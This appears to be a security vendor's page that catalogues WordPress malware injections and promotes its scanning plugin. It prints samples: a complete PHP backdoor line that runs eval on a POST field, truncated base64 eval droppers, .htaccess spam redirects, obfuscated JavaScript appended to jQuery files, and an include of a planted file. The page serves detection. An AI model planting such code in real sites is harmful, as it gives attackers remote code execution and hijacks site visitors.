Skip to content

WordPress tampering code examples

cleaning-268107_960_720

Mass generation of .suspected files in the site

Many files are generated in a writable folder in WordPress with the extension .suspected. The code is as follows

$mdgv0="pt_os"; $zxd9=strtoupper ($mdgv0[2]. $mdgv0[0]. $mdgv0[3].$mdgv0[4]. $mdgv0[1]);if(isset (${ $zxd9 } [ 'qab6e1b' ] ) ) { eval (${$zxd9 } ['qab6e1b'] ) ;} 

This code replaces pt_os to create a string _post, receives the post data, and runs the program with eval function. This code is very dangerous that can be executed by hackers.

 Almost all posts have the string < a style = “text-decoration: none” href = “/ plendil-buy -….” >. ≪ /a >

This code is called SEO spam and is a hack that links to the domain indicated by href = to enhance SEO. Since a character string is inserted in the post, it is done by taking over administrator privileges and using other vulnerabilities.

base64_decode

An example of this type of tampering code is as follows: A base64-encoded character string that is difficult for humans to read with base64_decode is returned to the program and executed as a statement with evel. The base64_decode includes a spam mail sending program.

eval(base64_decode("aWYoZnVuY3Rpb25f....jgfSAgfQ=="));?>

Mass generation of .htaccess files

A lot of unnecessary .htaccess is generated in various folders. The code content is a misleading code to other sites such as redirect processing. When access to a page containing a specific character string is matched, it redirects to the page that you want to flow in.

RewriteCond %{HTTP_REFERER} ^.*(google|ask....suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://[ link redacted ] [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuch....indloo|kobala|limier)\.(.*)
RewriteRule ^(.*)$ http://[ link redacted ] [R=301,L]

Tamper with the end of Javascript file

The falsification code is added to the end of jQuery files such as jQuery that are used as standard in WordPress. The code is written starting with an illegible comment like /*76we65sadradfyfa…62qetafduaygdau*/ and the code part has a lot of obfuscated code like \ x32 \ x32 \ x32 \ x32 \ x32 \ x32.

/*76we65sadradfyfa...62qetafduaygdau*/
window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"] ["\x66\x6....
/*76we65sadradfyfa...62qetafduaygdau*/

Added statement to Javascript file eval (function (p, a, c, k, e, d)

This type of hacking is also embedded in a Javascript file. Code that contains an obfuscated program starting with eval (function (p, a, c, k, e, d) is executed

 <sc​ript type="text/javascript">eval(fu​nction(p,a,c,k,e,d){e=fu​nction(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[fu​nction(e){return d[e]}];e=fu​nction(){re​turn'\w+'};c=1}....

Falsification code mixed in header.php, footer.php

Examples of tampering

echo base64_decode("VZAAtb5swEP....asdAA78kja");
@include_once("../wp-includes/gy2tI.php");

Please detect these code using our plugin.
WordPress Doctor Malware Scan & Security Plug-in